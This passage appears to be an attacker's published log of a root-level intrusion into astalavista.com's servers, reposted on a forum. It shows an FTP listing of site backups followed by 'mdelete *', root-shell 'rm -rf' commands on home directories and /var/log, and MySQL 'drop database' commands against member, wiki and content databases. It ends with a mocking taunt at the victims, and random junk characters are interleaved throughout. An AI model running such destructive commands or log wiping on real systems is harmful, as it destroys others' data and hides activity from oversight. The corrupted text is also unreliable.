: a; [3 H! |7 X5 [6 F( s227 Entering Passive Mode (212,254,194,163,2,189)8 u' i; z S" U0 J
150 Opening BINARY mode data connection for ‘file list’.
. L. [# {& ~8 ]' l-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar5 {% Z& s$ }5 K( }8 G
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2% E- z/ _1 O( Q7 {* `
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
R8 H+ Z: ]1 _-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
5 [! N( p2 q& @+ q* w% g-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
$ Y3 s( D9 E+ {[snip]
% M$ P0 w. Y1 w" u6 M226 Transfer complete.
& n+ K! @) S/ dftp> mdelete *
( q8 Y! M" A# V! i$ `ftp> ls -la" h2 f' t. s) g6 @$ f
227 Entering Passive Mode (212,254,194,163,2,193)" {+ L3 e Q# F5 c' y0 j- s
150 Opening BINARY mode data connection for ‘file list’. `& Q- W) K3 _$ v( w4 U, W( P4 y
226 Transfer complete.' C# M. m, P+ s) E2 U
ftp>
: @% L$ `& f# Y5 E/ B; p
$ o( T# L5 G9 e6 O9 ish-3.2# cd /home
4 a" ~, [ u1 k! o0 n6 jsh-3.2# ls -la' D/ T# ]( C7 ]9 \ o% G! W
total 120
/ [" ^+ p) `) Z3 edrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
* }9 e' \# j C* l2 P3 |9 Jdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .." i9 Q1 ?$ i' X' Y9 A3 A0 ]4 d
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
5 N3 P) i1 f/ J9 \8 c% X1 p( k0 ]) {-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
& `1 ~3 B$ v; L, V# _/ [& T( Y& J* M$ U-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
2 W$ H. q5 @" f$ ?4 g. t9 o$ P gdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet3 H2 o4 \, ^" C# k2 u9 P* f
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
: i8 }+ z; ~' R# t! v: F, e# Kdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141615 D# C; f6 {- t. R
drwx–x–x 10 com com 4096 Apr 28 12:40 com( D: f, [! i, Z8 `. a! p$ E7 Y
drwxr-xr-x 2 root root 4096 May 17 2007 ftp, [% E4 F! M, \: ~
drwx—— 3 jon jon 4096 Sep 21 2007 jon
, S/ A% Q" t5 @4 S0 r/ P2 i pdrwx—— 2 root root 16384 Sep 11 2007 lost+found
; [. @/ Z! d3 Y$ g7 Q0 a- c7 Rdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
$ J4 |' J0 R' R6 }0 P7 s2 }) {2 x$ hdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
3 U1 L% [5 m7 |drwx—— 2 jon jon 4096 Sep 15 2007 test
% H9 @8 V# M9 W. W8 k5 M$ ndrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp1 I$ f8 [. O3 |
/ ^ H) d, h* N6 Ysh-3.2# rm -rf backup/, w, {3 h/ a; Z# j- K( ~
sh-3.2# rm -rf backup.14161/
7 E( s5 y" E2 [9 ^- L" Rsh-3.2# rm -rf ftp/
0 w5 c) }& |& R" x1 {% m+ Z- ]+ hsh-3.2# rm -rf jon/
3 _1 Q0 U4 Y6 xsh-3.2# rm -rf my/8 u0 i9 H s6 p9 y- s
sh-3.2# rm -rf mysqldata/
: j( w6 ?+ V" _& v" ksh-3.2# rm -rf test/. c1 g; ~! w' w; K* S
sh-3.2# rm -rf tmp/3 f) v6 y& k" i. i. F) r
sh-3.2# cd ~+ W* T+ [& E0 R% r
sh-3.2# rm -rf *
* K V2 R: f* ~6 Tsh-3.2# rm -rf /var/log/
0 h3 l! Z) P4 ]4 @+ @rm: cannot remove directory `/var/log//proftpd’: Directory not empty9 B q$ `: C4 I# w5 P
sh-3.2# rm -rf /home/*
# a9 ?" n, ]6 O0 z- U7 P; Y. esh-3.2# mysql7 {/ P# f# R; O' N
Welcome to the MySQL monitor. Commands end with ; or \g.
# l: s6 M5 w3 X, D' QYour MySQL connection id is 407156+ U" I4 W- w; ]' A, Q: k6 @
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* o X* d0 n2 l- v" S% V5 H$ z/ \5 b7 D: v0 S, A' k7 N
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.$ e" Y0 `; n/ h( e5 D
! m- D0 z4 X; H# o3 Y. |: p& Vmysql> show databases;
8 ]- \" ^1 m! R) c* T5 |+———————–+
y% ^ a! G# I# S# r| Database |
# l7 V, B$ f9 a7 H. S+———————–+
. I$ ]" n9 Y# i7 @6 z+ I' K| information_schema |9 M g* k1 z, ^ Z+ S
| astanet_ads |( a' J! @; O! [
| astanet_mailing_lists |& j* R/ C9 y8 B- ~3 W- e2 b& Q; r
| astanet_mediawiki |2 O' z/ e* y, V. L- @+ U
| astanet_membersystem |
) h0 Z) ]$ M3 J2 E& Q7 r. ]| com_contrexx |7 W. Z* Q9 _( s) l$ }6 s1 c) T/ J
| com_contrexx2 |- u) d8 x2 ]* `7 d
| com_contrexx2_live |! m- D k+ E3 W
| da_roundcube |
8 Y5 h4 b9 E3 F- C- || dolphin |7 E: Y* b3 I3 n3 m4 q |/ G
| ideapool |( R, y6 X5 m; \" O/ E% u4 p5 x
| mysql |
' ?+ K. }; H3 g& B B| test |% d! C8 @! T+ r9 D
| yourmaster |) Z" f2 \! v2 `
+———————–+
- M" \, s& M- q. m+ }2 J14 rows in set (0.03 sec) ^- r/ _+ C A2 e/ S6 E
z1 [& X/ g1 N# ]* B ~( ?& `
mysql> drop database astanet_membersystem;1 Y9 J* ]# @7 P+ R
droQuery OK, 46 rows affected (0.81 sec)
2 T" T- L7 |/ {# I; U
( D" j* i( C+ M w8 R. M) Bmysql> drop database com_contrexx;
! z. ?6 A, d. w ]" LQuery OK, 211 rows affected (2.72 sec). ^, l6 h" T& `/ C
& D3 |1 d- L8 c% [ c9 W$ P" n- |mysql> drop database com_contrexx2;
7 e0 r3 s7 P6 y! Z6 W3 U0 b2 {Query OK, 237 rows affected (2.23 sec)
' f+ `4 o, |7 [, U0 L: D3 {
, W$ V5 g9 h, `* M4 Gmysql> drop database com_contrexx2_live;6 b8 t O! C. B7 h/ j
Query OK, 227 rows affected (7.63 sec)4 g& U1 J, v; z" m7 q3 p) P' X
, R+ X4 ^( H" @. Zmysql> drop database ideapool;
) p n6 ^$ Z6 w2 [+ U9 XQuery OK, 69 rows affected (0.19 sec)# C" e |* h3 w. c& }
+ r9 S) W; ^4 O; T+ q, m
mysql> drop database yourmaster;. |( R+ n" E9 [1 l
Query OK, 158 rows affected (0.55 sec)
9 D, c/ `) o- O2 ~
* @+ D: T4 ?+ smysql> drop database astanet_ads;
9 S( ~4 G% ?/ B `1 r! o5 I BQuery OK, 9 rows affected (0.11 sec)6 ^2 M- n+ C5 b3 N+ D e, _
( C7 U& |# S, v7 X% }mysql> drop database astanet_mailing_lists;& P3 v1 t0 F+ `$ \
Query OK, 24 rows affected (1.47 sec)+ I' S H, G1 V- F2 ~$ r
0 H; R' B, R: Q2 W0 xmysql> drop database astanet_mediawiki;& j. i1 ~% o, c7 n$ x
Query OK, 31 rows affected (0.51 sec)
" j1 F+ q; n* v8 f- l* c' O& Y! h* h$ P
mysql> show databases;
" C' g, t2 Y+ p+——————–+
# E$ @. @0 r7 q3 R/ U| Database |
- Q0 H0 b# g. N- _7 ~+——————–+
7 e9 y" ~1 a* N8 V. v$ a* ^| information_schema |' ^% |# y! ^% G6 I$ p* \
| da_roundcube |' ~ K) L1 a8 }* T7 P
| dolphin |
! _3 f1 s/ w* I A| mysql |' h) y F9 {0 a }2 P" \
| test |% T9 R. u6 P% V R" ~' j7 ?$ t
+——————–+6 t7 u1 e+ i7 S7 X9 U
5 rows in set (0.00 sec)7 o, J0 C) L* V( `% A8 w( q6 V+ ]
- u O0 q( k$ D! @, K. F( _$ U
What a journey! We’re not sure exactly why the “Terminator” had any influence on
9 H% R) Y) V8 y3 Ttheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
5 |/ e9 W; \! {. `- Pwrong to say this pack of morons *wont be back*.; l f4 ?7 m# g5 Y- D, q) @5 P- ~
|
发表于 2012-11-6 21:07:34
收藏
支持
反对